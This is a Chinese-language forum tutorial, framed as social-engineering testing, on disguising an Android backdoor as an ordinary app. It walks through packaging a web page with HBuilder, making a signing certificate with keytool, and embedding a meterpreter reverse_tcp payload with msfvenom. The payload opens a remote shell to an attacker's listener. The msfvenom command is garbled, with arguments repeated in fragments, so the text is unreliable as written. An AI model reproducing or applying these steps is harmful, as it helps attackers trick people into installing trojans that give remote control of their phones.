搜索
查看: 1732|回复: 0

浅谈Shell的伪装的艺术

[复制链接]

675

主题

987

帖子

2492

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2492

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2020-11-25 11:44:32 | 显示全部楼层 |阅读模式

在网络安全中,社会工程学 已经是一种最为致命的测试手段。常常让人出其不意,今天来看看如何利用 Shell伪装的艺术 来进行社会工程学测试。

伪装的艺术

伪装的艺术

对安卓 shell 的伪装

利用 HBuilder 将 Web 页面打包成 APP 文件-新建-移动APP 配置 APP 项目

需要注意是 页面入口 便是 APP 启动后要进入的页面。

设置图标

需要注意的是图标格式为 PNG

设置启动页

打包 APP

右键项目-发行-发行原生APP

关于签名 如果你不懂关于 androdi 的前面,建议使用公用证书。但是需要实名认证。于是我这里用了自己的证书!

自建证书

Kali 下我们利用下面命令建立证书。

keytool -genkey -alias testalias -keyalg RSA -keysize 2048 -validity 36500 -keystore kali.keystore

Bash

 复制

这样我们便创建了一个名为 kali.keystore 的证书,输入证书的密码,位置等信息打包即可!

获取 app

发行-查看APP打包状态 获取已经打包好的 app

添加后门

msfvenom -p -x kali.apk android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > kali1.apk=192.168.232.195 LPORT=5555 R > kali1.apk192.168.232.195 LPORT=5555 R > kali1.apk=5555 R > kali1.apk5555 R > kali1.apk> kali1.apk kali1.apk

Bash

 复制

参数说明: -x 原生 APP kali1.apk 最后生成含有后门的 app

安装 app

运行 app

有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表